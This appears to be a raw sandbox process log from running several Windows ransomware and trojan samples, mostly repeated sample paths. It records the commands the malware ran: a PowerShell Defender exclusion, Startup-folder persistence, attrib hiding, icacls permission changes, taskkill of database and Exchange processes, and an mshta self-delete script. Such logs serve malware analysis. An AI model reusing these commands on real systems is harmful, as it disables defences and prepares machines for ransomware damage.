C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan.MSIL.Crypt.gen-9a0a0c350a8cb3b73b4bdad8e62551a91186b74941f1b06782241d27000b5817.exe
HEUR-Trojan.MSIL.Crypt.gen-9a0a0c350a8cb3b73b4bdad8e62551a91186b74941f1b06782241d27000b5817.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\sevnz.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\sevnz.exe" runas
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\RarSFX0\sevnz.exe" "C:\Users\Admin\AppData\Roaming\sevnz.exe"
C:\Users\Admin\Desktop\00484\HEUR-Trojan.MSIL.DelShad.gen-9607bb14dd16cc34af77753a5b88baa0315a677a27069b2fe7efd9d68d7397a7.exe
HEUR-Trojan.MSIL.DelShad.gen-9607bb14dd16cc34af77753a5b88baa0315a677a27069b2fe7efd9d68d7397a7.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\AppData\Local\Temp\fake.exe
"C:\Users\Admin\AppData\Local\Temp\fake.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h +r +s "C:\Users\Admin\AppData\Local\Temp\fake.exe"
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan.Win32.Kryptik.gen-f707358b901273d58b90fa11b8ac8395c9c5506962f50f8b73ed084ea64e83f2.exe
HEUR-Trojan.Win32.Kryptik.gen-f707358b901273d58b90fa11b8ac8395c9c5506962f50f8b73ed084ea64e83f2.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Program Files (x86)\gjcsw\dwiu.exe
"C:\Program Files (x86)\gjcsw\dwiu.exe"
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\f2dae117-221c-42dd-a511-f6e11a6a70d0" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM explorer.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM Microsoft.Exchange
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM MSExchange
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM sqlserver.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM sqlwriter.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM mysqld.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svcran.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svcran.exe"
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\Trojan-Ransom.Win32.Blocker.iyjg-fb7807b792c28f5305b9e3db6fb2cc47f8a995d8444a6cdcb38060da08240169.exe
Trojan-Ransom.Win32.Blocker.iyjg-fb7807b792c28f5305b9e3db6fb2cc47f8a995d8444a6cdcb38060da08240169.exe
C:\Windows\system32\icacls.exe
icacls "C:\Users\Admin\AppData\Roaming" /grant Everyone:(OI)(CI)F /T
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\Admin.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\AppData\Roaming\sevnz.exe
"C:\Users\Admin\AppData\Roaming\sevnz.exe"
C:\Windows\SysWOW64\mshta.exe
mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('sevnz.exe');close()}catch(e){}},10);"
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
C:\Users\Admin\Desktop\00484\HEUR-Trojan-Ransom.Win32.ExPetr.gen-f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589.exe
